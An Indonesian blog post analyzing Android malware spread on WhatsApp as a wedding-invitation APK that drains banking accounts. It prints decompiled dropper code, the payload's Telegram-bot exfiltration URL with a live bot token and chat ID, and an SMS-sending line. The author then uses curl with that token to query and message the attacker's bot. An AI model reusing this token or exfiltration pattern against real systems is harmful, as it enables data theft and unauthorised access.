Apakah kalian pernah mendapatkan pesan via WA dengan judul Undangan Pernikahan.apk? Yup pesan tersebut berisi malware buat nyedot semua data yang kamu punya, mem by pass SMS / OTP sehingga akun mobile banking mu bisa terkuras habis. Berikut adalah no WA yang telah dibajak oleh penipu buat sebarkan malware nya. Ternyata yang bikin agak goblog juga alias amatiran!
File nya terlalu besar sehingga orang/target akan males buat download!
Salah satu tools yang bisa kalian gunakan untuk reverse engineering yaitu jadx. Bila kalian penggunakan macbook, bisa install
brew install jadx
mari kita analisis kode nya, saya ubah terlebih dahulu nama aplikasi diatas menjadi myapp.apk biar mudah saja
jadx-gui myapp.apk
akan tampil kotak dialog, langsung menuju saja file MainActivity bila kita lihat lagi
protected void onCreate(Bundle savedInstanceState) throws IOException {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
installApkFromAssets();
}
Saat aplikasi dijalankan (onCreate()), langsung memanggil installApkFromAssets() tanpa interaksi pengguna.
kita telusuri lagi
private void installApkFromAssets() throws IOException {
AssetManager assetManager = getAssets();
InputStream in = assetManager.open(APK_NAME);
-
APK_NAME = ".apk"artinya program mencoba membuka file bernama.apkyang disembunyikan di folderassets/(tanpa nama, hanya ekstensi). -
Ini tidak lazim untuk aplikasi normal, karena
.apkbiasanya diberi nama jelas.
Mari kita buka folder asset
ternyata bersembunyi disitu, kita export saja dan diberi nama curiga.apk. Mari kita lihat isinya apa saja
https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/sendMessage?parse_mode=markdown&chat_id=8101458124&text
yup ternyata dilempar ke bot telegram
-
chat_id:
8101458124 -
Nomor telepon tujuan SMS:
082297940781
Menarik sekali, kita cek lagi, apakah WA nya aktif dari penipu? dari kode tertera
SmsManager.getDefault().sendTextMessage("082297940781", null, "sukses ", null, null);
mari kita cek!
ternyata aktif juga, mari kita cek BOT telegram pada source code tersebut
curl -s "https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/getMe" | jq
{
"ok": true,
"result": {
"id": 8425955984,
"is_bot": true,
"first_name": "Botwooow",
"username": "Aaallkkjjhh_bot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
ternyata dilempar ke bot telegram, mari kita cek dilempar kemana lagi
curl -s "https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/getChat?chat_id=8101458124" | jq
{
"ok": true,
"result": {
"id": 8101458124,
"first_name": "Gggggg",
"username": "Jabebalu",
"type": "private",
"can_send_gift": true,
"active_usernames": [
"Jabebalu"
],
"accepted_gift_types": {
"unlimited_gifts": true,
"limited_gifts": true,
"unique_gifts": true,
"premium_subscription": true
},
"max_reaction_count": 11,
"accent_color_id": 4
}
}
ternyata ke username Jabebalu sebagai pemegang data terakhir!
sekalian kita kirim pesan ke penipu via URL
https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/sendMessage?parse_mode=markdown&chat_id=8101458124&text=ente%20goblog
itulah pesan cinta dari saya buat penipu
Saran saja buat penipu,
filenya terlalu besar ukurannya! bodoh sekali bikin file segede itu terlalu banyak pakai library